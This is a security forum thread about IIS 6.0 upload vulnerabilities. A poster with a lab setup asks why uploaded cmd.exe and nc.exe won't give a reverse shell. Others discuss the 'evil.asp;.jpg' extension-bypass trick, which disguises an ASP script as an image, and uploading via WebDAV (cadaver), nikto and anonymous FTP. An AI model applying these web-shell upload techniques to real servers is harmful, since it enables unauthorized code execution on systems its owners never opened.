I'll try to keep the backstory short on this.  We have an outside vendor that has developed a web-based application for one of our departments.  The application allows the logged on user to upload files into a directory that is accessible to the web server.  In other words, you can upload a file, and then point your browser at that file.  We have some concerns about this, so I decided to set up a test machine to test a potential vulnerability. 

I have set up IIS 6.0 on a virtual machine running a fully patched evaluation version of Windows Server 2003 and I set some ridiculously wide open permissions on the folder and whipped up an ASP.NET application that lets an anonymous user upload any file to the wwwroot directory.  I have verified that I was able to upload cmd.exe and nc.exe to the wwwroot directory.

The problem is, I can't seem to do anything with those files that I uploaded.  I have made sure that everyone has execute permission on the wwwroot folder, but I still can't seem to get a reverse shell.  I can't even seem to get a directory listing.  I tried putting this into my browser:

but I keep getting a page cannot be displayed error.  I also tried:
which also hasn't worked.  Does anyone know IIS well enough to tell me what I've done wrong here?  Is there some setting that I haven't opened up so that the web server can run the exe?  Is there something wrong with the http request that I've sent to the server?

i was about to make new thread asking how to this exploit how to get a shell on IIS 6.0 server ??

i tried to figure out the way in this site u mentioned but no luck

is there any proper way to do it i mean more explain from u ?

thanks alot for the info and i want to ask somethings :

i found link at the same page and leading to some tips useful to me as the following :

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

at this part after i created the fake jpg file to upload to the web server as its real .asp script but he said upload this file to the server ??

1- how to upload the file to the server ?
2- how to know that it takes this directory at the server /images/ ?
3- and should i navigate to this directory location via browser ? or specific port via telnet ?
4- what should i do if the server doesn't allow users to upload ?

i hope u can answer this question cuz its gonna enlight me alot

thanks in advance

He used a webdav client called cadaver to upload the file. He provide a reference link below in his blog but you could get it here. You could use the webdav auxiliary modules to verify it's up and running.

To try to answer some of your questions above:
1- how to upload the file to the server?
A. If FTP allows anonymous access and allows you to upload files that'd be good. WebDav also allows you to upload files - look into cadaver.
2- how to know that it takes this directory at the server /images/ ?
A. You could use a tool like nikto to find out what type of files are allowed  to get uploaded. One of the webdav auxiliary modules may also give you some information regarding this.
3- and should i navigate to this directory location via browser ? or specific port via telnet ?
A. Reference Answer 1.
4- what should i do if the server doesn't allow users to upload ?
A. Try Harder™

i've reread this post a few times to try to find the question but i think you are asking other ways to get files on the server.

obviously the blog post is about exploiting webdav shares or writeable shares via normal windows networking.  you could also use some of those techniques if a site allows file uploads as well.  the same caveats would *usually* apply that you cant upload .exe or .asp(x) files in that case it the bypass method may still work for you.

hope that helps